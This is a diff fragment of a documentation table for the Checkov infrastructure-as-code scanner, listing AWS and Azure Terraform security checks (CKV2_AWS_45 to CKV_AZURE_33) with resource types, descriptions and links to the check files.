+| 1169 | CKV2_AWS_45     | resource | aws_config_configuration_recorder_status                | Ensure AWS Config recorder is enabled to record all supported resources                                                                                                                                  | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml)                                                                       |
+| 1170 | CKV2_AWS_46     | resource | aws_cloudfront_distribution                             | Ensure AWS CloudFront Distribution with S3 have Origin Access set to enabled                                                                                                                             | Terraform | [CLoudFrontS3OriginConfigWithOAI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CLoudFrontS3OriginConfigWithOAI.yaml)                                                         |
+| 1171 | CKV2_AWS_47     | resource | aws_cloudfront_distribution                             | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability                                                                                                               | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml)                       |
+| 1172 | CKV2_AWS_47     | resource | aws_wafv2_web_acl                                       | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability                                                                                                               | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml)                       |
+| 1173 | CKV2_AWS_48     | resource | aws_config_configuration_recorder                       | Ensure AWS Config must record all possible resources                                                                                                                                                     | Terraform | [ConfigRecorderRecordsAllGlobalResources.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ConfigRecorderRecordsAllGlobalResources.yaml)                                         |
+| 1174 | CKV2_AWS_49     | resource | aws_dms_endpoint                                        | Ensure AWS Database Migration Service endpoints have SSL configured                                                                                                                                      | Terraform | [DMSEndpointHaveSSLConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/DMSEndpointHaveSSLConfigured.yaml)                                                               |
+| 1175 | CKV2_AWS_50     | resource | aws_elasticache_replication_group                       | Ensure AWS ElastiCache Redis cluster with Multi-AZ Automatic Failover feature set to enabled                                                                                                             | Terraform | [ElastiCacheRedisConfiguredAutomaticFailOver.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElastiCacheRedisConfiguredAutomaticFailOver.yaml)                                 |
+| 1176 | CKV2_AWS_51     | resource | aws_api_gateway_stage                                   | Ensure AWS API Gateway endpoints uses client certificate authentication                                                                                                                                  | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml)                 |
+| 1177 | CKV2_AWS_51     | resource | aws_apigatewayv2_api                                    | Ensure AWS API Gateway endpoints uses client certificate authentication                                                                                                                                  | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml)                 |
+| 1178 | CKV2_AWS_51     | resource | aws_apigatewayv2_stage                                  | Ensure AWS API Gateway endpoints uses client certificate authentication                                                                                                                                  | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml)                 |
+| 1179 | CKV2_AWS_52     | resource | aws_elasticsearch_domain                                | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled                                                                                                                               | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml)                                             |
+| 1180 | CKV2_AWS_52     | resource | aws_opensearch_domain                                   | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled                                                                                                                               | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml)                                             |
+| 1181 | CKV2_AWS_53     | resource | aws_api_gateway_method                                  | Ensure AWS API gateway request is validated                                                                                                                                                              | Terraform | [APIGatewayRequestParameterValidationEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayRequestParameterValidationEnabled.yaml)                                 |
+| 1182 | CKV2_AWS_54     | resource | aws_cloudfront_distribution                             | Ensure AWS CloudFront distribution is using secure SSL protocols for HTTPS communication                                                                                                                 | Terraform | [CloudFrontUsesSecureProtocolsForHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontUsesSecureProtocolsForHTTPS.yaml)                                             |
+| 1183 | CKV2_AWS_55     | resource | aws_emr_cluster                                         | Ensure AWS EMR cluster is configured with security configuration                                                                                                                                         | Terraform | [EMRClusterHasSecurityConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EMRClusterHasSecurityConfiguration.yaml)                                                   |
+| 1184 | CKV2_AWS_56     | resource | aws_iam_group_policy_attachment                         | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                             |
+| 1185 | CKV2_AWS_56     | resource | aws_iam_policy_attachment                               | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                             |
+| 1186 | CKV2_AWS_56     | resource | aws_iam_role                                            | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                             |
+| 1187 | CKV2_AWS_56     | resource | aws_iam_role_policy_attachment                          | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                             |
+| 1188 | CKV2_AWS_56     | resource | aws_iam_user_policy_attachment                          | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                             |
+| 1189 | CKV2_AWS_56     | resource | aws_ssoadmin_managed_policy_attachment                  | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                             |
+| 1190 | CKV2_AWS_56     | resource | data.aws_iam_policy                                     | Ensure AWS Managed IAMFullAccess IAM policy is not used.                                                                                                                                                 | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml)                                                             |
+| 1191 | CKV2_AWS_57     | resource | aws_secretsmanager_secret                               | Ensure Secrets Manager secrets should have automatic rotation enabled                                                                                                                                    | Terraform | [SecretsAreRotated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SecretsAreRotated.yaml)                                                                                     |
+| 1192 | CKV2_AWS_58     | resource | aws_neptune_cluster                                     | Ensure AWS Neptune cluster deletion protection is enabled                                                                                                                                                | Terraform | [NeptuneDeletionProtectionEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NeptuneDeletionProtectionEnabled.yaml)                                                       |
+| 1193 | CKV2_AWS_59     | resource | aws_elasticsearch_domain                                | Ensure ElasticSearch/OpenSearch has dedicated master node enabled                                                                                                                                        | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml)                                                 |
+| 1194 | CKV2_AWS_59     | resource | aws_opensearch_domain                                   | Ensure ElasticSearch/OpenSearch has dedicated master node enabled                                                                                                                                        | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml)                                                 |
+| 1195 | CKV2_AWS_60     | resource | aws_db_instance                                         | Ensure RDS instance with copy tags to snapshots is enabled                                                                                                                                               | Terraform | [RDSEnableCopyTagsToSnapshot.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSEnableCopyTagsToSnapshot.yaml)                                                                 |
+| 1196 | CKV2_AWS_61     | resource | aws_s3_bucket                                           | Ensure that an S3 bucket has a lifecycle configuration                                                                                                                                                   | Terraform | [S3BucketLifecycle.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLifecycle.yaml)                                                                                     |
+| 1197 | CKV2_AWS_62     | resource | aws_s3_bucket                                           | Ensure S3 buckets should have event notifications enabled                                                                                                                                                | Terraform | [S3BucketEventNotifications.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEventNotifications.yaml)                                                                   |
+| 1198 | CKV2_AWS_63     | resource | aws_networkfirewall_firewall                            | Ensure Network firewall has logging configuration defined                                                                                                                                                | Terraform | [NetworkFirewallHasLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NetworkFirewallHasLogging.yaml)                                                                     |
+| 1199 | CKV2_AWS_64     | resource | aws_kms_key                                             | Ensure KMS key Policy is defined                                                                                                                                                                         | Terraform | [KmsKeyPolicyIsDefined.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/KmsKeyPolicyIsDefined.yaml)                                                                             |
+| 1200 | CKV2_AWS_65     | resource | aws_s3_bucket_ownership_controls                        | Ensure access control lists for S3 buckets are disabled                                                                                                                                                  | Terraform | [AWSdisableS3ACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSdisableS3ACL.yaml)                                                                                         |
+| 1201 | CKV2_AWS_66     | resource | aws_mwaa_environment                                    | Ensure MWAA environment is not publicly accessible                                                                                                                                                       | Terraform | [AWS_private_MWAA_environment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWS_private_MWAA_environment.yaml)                                                               |
+| 1202 | CKV2_AWS_68     | resource | aws_iam_role                                            | Ensure SageMaker notebook instance IAM policy is not overly permissive                                                                                                                                   | Terraform | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml)                           |
+| 1203 | CKV2_AWS_68     | resource | aws_sagemaker_notebook_instance                         | Ensure SageMaker notebook instance IAM policy is not overly permissive                                                                                                                                   | Terraform | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml)                           |
+| 1204 | CKV_AZURE_1     | resource | azurerm_linux_virtual_machine                           | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead)                                                                                                                             | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py)                                                                                   |
+| 1205 | CKV_AZURE_1     | resource | azurerm_virtual_machine                                 | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead)                                                                                                                             | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py)                                                                                   |
+| 1206 | CKV_AZURE_2     | resource | azurerm_managed_disk                                    | Ensure Azure managed disk has encryption enabled                                                                                                                                                         | Terraform | [AzureManagedDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryption.py)                                                                         |
+| 1207 | CKV_AZURE_3     | resource | azurerm_storage_account                                 | Ensure that 'enable_https_traffic_only' is enabled                                                                                                                                                       | Terraform | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsTransportEncryption.py)                                                         |
+| 1208 | CKV_AZURE_4     | resource | azurerm_kubernetes_cluster                              | Ensure AKS logging to Azure Monitoring is Configured                                                                                                                                                     | Terraform | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLoggingEnabled.py)                                                                                           |
+| 1209 | CKV_AZURE_5     | resource | azurerm_kubernetes_cluster                              | Ensure RBAC is enabled on AKS clusters                                                                                                                                                                   | Terraform | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSRbacEnabled.py)                                                                                                 |
+| 1210 | CKV_AZURE_6     | resource | azurerm_kubernetes_cluster                              | Ensure AKS has an API Server Authorized IP Ranges enabled                                                                                                                                                | Terraform | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSApiServerAuthorizedIpRanges.py)                                                                 |
+| 1211 | CKV_AZURE_7     | resource | azurerm_kubernetes_cluster                              | Ensure AKS cluster has Network Policy configured                                                                                                                                                         | Terraform | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNetworkPolicy.py)                                                                                             |
+| 1212 | CKV_AZURE_8     | resource | azurerm_kubernetes_cluster                              | Ensure Kubernetes Dashboard is disabled                                                                                                                                                                  | Terraform | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSDashboardDisabled.py)                                                                                     |
+| 1213 | CKV_AZURE_9     | resource | azurerm_network_security_group                          | Ensure that RDP access is restricted from the internet                                                                                                                                                   | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py)                                                                         |
+| 1214 | CKV_AZURE_9     | resource | azurerm_network_security_rule                           | Ensure that RDP access is restricted from the internet                                                                                                                                                   | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py)                                                                         |
+| 1215 | CKV_AZURE_10    | resource | azurerm_network_security_group                          | Ensure that SSH access is restricted from the internet                                                                                                                                                   | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py)                                                                         |
+| 1216 | CKV_AZURE_10    | resource | azurerm_network_security_rule                           | Ensure that SSH access is restricted from the internet                                                                                                                                                   | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py)                                                                         |
+| 1217 | CKV_AZURE_11    | resource | azurerm_mariadb_firewall_rule                           | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                                                                                                            | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py)                                                                               |
+| 1218 | CKV_AZURE_11    | resource | azurerm_mysql_firewall_rule                             | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                                                                                                            | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py)                                                                               |
+| 1219 | CKV_AZURE_11    | resource | azurerm_postgresql_firewall_rule                        | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                                                                                                            | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py)                                                                               |
+| 1220 | CKV_AZURE_11    | resource | azurerm_sql_firewall_rule                               | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                                                                                                            | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py)                                                                               |
+| 1221 | CKV_AZURE_12    | resource | azurerm_network_watcher_flow_log                        | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                                                                                                                   | Terraform | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkWatcherFlowLogPeriod.py)                                                                       |
+| 1222 | CKV_AZURE_13    | resource | azurerm_app_service                                     | Ensure App Service Authentication is set on Azure App Service                                                                                                                                            | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py)                                                                             |
+| 1223 | CKV_AZURE_13    | resource | azurerm_linux_web_app                                   | Ensure App Service Authentication is set on Azure App Service                                                                                                                                            | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py)                                                                             |
+| 1224 | CKV_AZURE_13    | resource | azurerm_windows_web_app                                 | Ensure App Service Authentication is set on Azure App Service                                                                                                                                            | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py)                                                                             |
+| 1225 | CKV_AZURE_14    | resource | azurerm_app_service                                     | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service                                                                                                                                  | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py)                                                                                       |
+| 1226 | CKV_AZURE_14    | resource | azurerm_linux_web_app                                   | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service                                                                                                                                  | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py)                                                                                       |
+| 1227 | CKV_AZURE_14    | resource | azurerm_windows_web_app                                 | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service                                                                                                                                  | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py)                                                                                       |
+| 1228 | CKV_AZURE_15    | resource | azurerm_app_service                                     | Ensure web app is using the latest version of TLS encryption                                                                                                                                             | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py)                                                                               |
+| 1229 | CKV_AZURE_15    | resource | azurerm_linux_web_app                                   | Ensure web app is using the latest version of TLS encryption                                                                                                                                             | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py)                                                                               |
+| 1230 | CKV_AZURE_15    | resource | azurerm_windows_web_app                                 | Ensure web app is using the latest version of TLS encryption                                                                                                                                             | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py)                                                                               |
+| 1231 | CKV_AZURE_16    | resource | azurerm_app_service                                     | Ensure that Register with Azure Active Directory is enabled on App Service                                                                                                                               | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py)                                                                                         |
+| 1232 | CKV_AZURE_16    | resource | azurerm_linux_web_app                                   | Ensure that Register with Azure Active Directory is enabled on App Service                                                                                                                               | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py)                                                                                         |
+| 1233 | CKV_AZURE_16    | resource | azurerm_windows_web_app                                 | Ensure that Register with Azure Active Directory is enabled on App Service                                                                                                                               | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py)                                                                                         |
+| 1234 | CKV_AZURE_17    | resource | azurerm_app_service                                     | Ensure the web app has 'Client Certificates (Incoming client certificates)' set                                                                                                                          | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py)                                                                       |
+| 1235 | CKV_AZURE_17    | resource | azurerm_linux_web_app                                   | Ensure the web app has 'Client Certificates (Incoming client certificates)' set                                                                                                                          | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py)                                                                       |
+| 1236 | CKV_AZURE_17    | resource | azurerm_windows_web_app                                 | Ensure the web app has 'Client Certificates (Incoming client certificates)' set                                                                                                                          | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py)                                                                       |
+| 1237 | CKV_AZURE_18    | resource | azurerm_app_service                                     | Ensure that 'HTTP Version' is the latest if used to run the web app                                                                                                                                      | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py)                                                                             |
+| 1238 | CKV_AZURE_18    | resource | azurerm_linux_web_app                                   | Ensure that 'HTTP Version' is the latest if used to run the web app                                                                                                                                      | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py)                                                                             |
+| 1239 | CKV_AZURE_18    | resource | azurerm_windows_web_app                                 | Ensure that 'HTTP Version' is the latest if used to run the web app                                                                                                                                      | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py)                                                                             |
+| 1240 | CKV_AZURE_19    | resource | azurerm_security_center_subscription_pricing            | Ensure that standard pricing tier is selected                                                                                                                                                            | Terraform | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterStandardPricing.py)                                                                   |
+| 1241 | CKV_AZURE_20    | resource | azurerm_security_center_contact                         | Ensure that security contact 'Phone number' is set                                                                                                                                                       | Terraform | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactPhone.py)                                                                         |
+| 1242 | CKV_AZURE_21    | resource | azurerm_security_center_contact                         | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                                                                                                            | Terraform | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlert.py)                                                               |
+| 1243 | CKV_AZURE_22    | resource | azurerm_security_center_contact                         | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                                                                                                            | Terraform | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlertAdmins.py)                                                   |
+| 1244 | CKV_AZURE_23    | resource | azurerm_mssql_server                                    | Ensure that 'Auditing' is set to 'On' for SQL servers                                                                                                                                                    | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml)                                                                     |
+| 1245 | CKV_AZURE_23    | resource | azurerm_mssql_server_extended_auditing_policy           | Ensure that 'Auditing' is set to 'On' for SQL servers                                                                                                                                                    | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml)                                                                     |
+| 1246 | CKV_AZURE_23    | resource | azurerm_sql_server                                      | Ensure that 'Auditing' is set to 'On' for SQL servers                                                                                                                                                    | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml)                                                                     |
+| 1247 | CKV_AZURE_24    | resource | azurerm_mssql_server                                    | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers                                                                                                                               | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml)                                                     |
+| 1248 | CKV_AZURE_24    | resource | azurerm_mssql_server_extended_auditing_policy           | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers                                                                                                                               | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml)                                                     |
+| 1249 | CKV_AZURE_24    | resource | azurerm_sql_server                                      | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers                                                                                                                               | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml)                                                     |
+| 1250 | CKV_AZURE_25    | resource | azurerm_mssql_server_security_alert_policy              | Ensure that 'Threat Detection types' is set to 'All'                                                                                                                                                     | Terraform | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerThreatDetectionTypes.py)                                                                   |
+| 1251 | CKV_AZURE_26    | resource | azurerm_mssql_server_security_alert_policy              | Ensure that 'Send Alerts To' is enabled for MSSQL servers                                                                                                                                                | Terraform | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsEnabled.py)                                                                       |
+| 1252 | CKV_AZURE_27    | resource | azurerm_mssql_server_security_alert_policy              | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers                                                                                                                         | Terraform | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsToAdminsEnabled.py)                                                       |
+| 1253 | CKV_AZURE_28    | resource | azurerm_mysql_server                                    | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server                                                                                                                            | Terraform | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerSSLEnforcementEnabled.py)                                                             |
+| 1254 | CKV_AZURE_29    | resource | azurerm_postgresql_server                               | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server                                                                                                                       | Terraform | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerSSLEnforcementEnabled.py)                                                   |
+| 1255 | CKV_AZURE_30    | resource | azurerm_postgresql_configuration                        | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server                                                                                                                  | Terraform | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogCheckpointsEnabled.py)                                                   |
+| 1256 | CKV_AZURE_31    | resource | azurerm_postgresql_configuration                        | Ensure server parameter 'log_connections' is set to 'ON' for PostgreSQL Database Server                                                                                                                  | Terraform | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogConnectionsEnabled.py)                                                   |
+| 1257 | CKV_AZURE_32    | resource | azurerm_postgresql_configuration                        | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server                                                                                                            | Terraform | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerConnectionThrottlingEnabled.py)                                       |
+| 1258 | CKV_AZURE_33    | resource | azurerm_storage_account                                 | Ensure Storage logging is enabled for Queue service for read, write and delete requests                                                                                                                  | Terraform | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountLoggingQueueServiceEnabled.py)                                             |
